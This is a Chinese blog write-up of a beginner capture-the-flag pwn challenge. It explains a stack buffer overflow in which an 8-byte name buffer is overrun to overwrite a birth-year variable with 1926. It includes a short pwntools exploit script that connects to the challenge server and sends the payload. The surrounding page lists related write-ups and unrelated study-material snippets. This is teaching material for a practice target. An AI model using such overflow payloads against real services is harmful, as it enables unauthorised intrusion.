whendidyouborn

最新推荐文章于 2019-08-05 10:15:00 发布
最新推荐文章于 2019-08-05 10:15:00 发布
阅读量137 收藏
点赞数 2
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42302601/article/details/97911435
版权

查看源码已知birth=1926可以得出flag在这里插入图片描述

但是源码在直接输入birth=1926时候进行了过滤
根据ida给的name和birth可以发现他们相差八个字节
所以在进行输入name时可以进行覆盖 构造payload=‘a’*8+p32(1926)

EXP

coding=utf-8

*from pwn import *

p= remote(‘111.198.29.45’,33452)
#远程连接

payload = ‘a’*8 + p32(1926)
#p32表示传输的是一个四字节数
p.recvuntil(“What’s Your Birth?\n”)
p.sendline(“28”)
#sendline相当于发送一行数据
p.recvuntil(“What’s Your Name?\n”)
p.sendline(payload)
p.interactive()
#与shell交互

4HftysN
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
河南省濮阳市第六中学2014-2015学年八年级英语下册 Unit 1 When was he born Period 2 Se
08-19
例如:"How long did David stand in a box of ice?" 这类问题询问的是一个时间段。在回答此类问题时,通常会用到介词 "for",表示动作持续了多久。如:"I studied for 2 years." 你可以尝试以下题目: - 提问:She...
18.9.16 PWN----When Did You Born
qq_42192672的博客
09-16 1273
最近想学一下pwn的基础 这个是南邮CTF平台的PWN的第一题把算是(老平台的唯一一道) 听大神说pwn很多文件都采取elf头,所以推荐在linux下食用 直接拖进IDA,分析一下 看下来是利用缓冲区溢出吧,先输入v4字符串覆盖空间,然后再给v5赋值1926就好了,试试看,从ebp的偏移可以看出来v4距离v5需要覆盖8个字节 但是有个坑就是刚开始What's your birth那里...
cgctf when_did_you_born 栈溢出简单利用
ditto的博客
12-22 2544
拿到题目,先checksec下,看下防护措施: 没有开启PIE。 直接放到IDA里看下: 有些变量名为了方便看,我已经修改过了。图中箭头处即是溢出点。 分析下 第一次输入overflowme,如果等于1926就会退出,但是想要拿到flag,就需要overflowme的值为1926,那就很明显了,第一次输入的时候随便输个数只要不是1926就行,第二次输入v4 这个数组的时候,利用缓冲区溢出,将o...
when_did_you_born 栈溢出简单利用
zyh18851473527的博客
08-05 580
直接放到IDA里看下: 显而易见只要v5=1926,就可以看flag。但按照前面的逻辑不可以等于所以 就涉及到了溢出。gets函数溢出,这道题关键v5一开始不为1926,后面必须是1926,所以通过栈可以知道,用v4覆盖v5 下面利用缓冲区溢出,先输入v4字符串覆盖空间,然后再给v5赋值1926就好了,试试看,从ebp的偏移可以看出来v4距离v5需要覆盖8个字节 这样就得到flag啦 ...
黑龙江省绥化市第九中学九年级英语全册《Unit 9 When was it invented Section B(3a-4b)》
08-19
- **Did you know that tea, the second most popular drink in the world (after water), was invented accidentally?** 你知道茶,世界上第二受欢迎的饮料(仅次于水),是偶然被发明的吗? - **Although tea ...
六年级英语下册Module7Unit2Shecouldn’tseeorhear作业外研版三起202004271138
09-08
、When were you born?等。学生需要选择合适的答语,完成对话。 五、阅读短文,判断正(T)误(F): 最后,该单元还包括了阅读短文,考查学生对英语阅读理解能力。该短文讲述了Tai Lihua的故事,她是一名中国妇女,...
人教版(新起点)小学六年级下册英语人教版六下Unit1.pdf
09-26
=> When were you born? * 句子翻译:他是一名医生=> He is a doctor. * 句子翻译:他出生于 2015年7月6日=> He was born on July 6, 2015. * 句子翻译:我想成为一名教师=> I want to be a teacher. * 短语翻译:拉...
山东省淄博市高青县八年级英语下册Unit1Whenwasheborn检测题鲁教版五四制
09-09
11. When did you start learning English? - 你什么时候开始学英语的? 四、完形填空: 这部分内容介绍了比尔·盖茨的生平,涉及的语法点包括日期表达、地点介词、动词过去式、一般现在时、动词不定式、形容词修饰...
高端商务活动策划商业计划书PPT模板
07-12
【作品名称】:高端商务活动策划商业计划书PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
工作述职报告PPT模板
07-12
【作品名称】:工作述职报告PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
工作报告季度计划工作总结PPT模板
07-12
【作品名称】:工作报告季度计划工作总结PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
数字乡村初步设计解决方案Word(306页).docx
07-12
数字乡村建设解决方案旨在通过数字化转型促进乡村振兴和农业农村现代化。该方案强调了数字乡村建设的战略机遇,以"1+3+5"工程为总体框架,即一个大数据中心、三大服务平台和五类主题应用。方案着重于乡村治理、产业发展和公共服务三大问题,通过完善治理体系、升级治理能力、强化产业链条和改善资源配置来推动乡村全面振兴。 方案中提出的数字乡村大数据中心是信息资源的集散地,依托大数据、AI、物联网等新技术,实现数据驱动的决策支持。三大服务平台包括产业服务、民生服务和治理服务,旨在提升农业生产智能化、经营网络化,同时优化乡村治理结构和提升服务效能。五类主题应用覆盖生产管理、流通营销、行业监管、公共服务和乡村治理,通过具体业务应用体系,实现农业全产业链的数字化管理和服务。 预期建设效益包括通过信息技术促进乡村优势产业发展,形成城郊融合型数字乡村治理新模式,以及创新服务方式,提升服务能力,保障农民权益。整体而言,该方案以数字化为手段,推动乡村经济、治理、文化等多方面的全面升级和发展。
html css js网页设计.txt
07-12
html css js网页设计
2024年电脑配色系统行业分析报告.pptx
07-12
行业报告
黑龙江科技大学考研11个学院,67个专业课历年考试真题及答案汇总,备考资料题库笔记,录用名单汇总.pdf
07-12
全国905所考研院校5万个专业课,初试复试历年真题及答案、备考资料题库笔记、专业课视频讲解、调剂信息查询等领取
工作总结工作计划竞聘报告述职报告PPT模板 (2)
07-12
【作品名称】:工作总结工作计划竞聘报告述职报告PPT模板 (2) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
海军航空大学考研,70个专业课历年考试真题及答案汇总,备考资料题库笔记,录用名单汇总.pdf
07-12
全国905所考研院校5万个专业课,初试复试历年真题及答案、备考资料题库笔记、专业课视频讲解、调剂信息查询等领取
[OGSM]认识年度经营计划管理双份文档.ppt
最新发布
07-12
[OGSM]认识年度经营计划管理双份文档.ppt
skelekton2.png
07-12
skelekton2.png
When did you update the last time?
03-31
As an AI language model, I don't update like a software program. However, the developers of OpenAI, the company that created me, do update my language and training data periodically to ensure that I ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值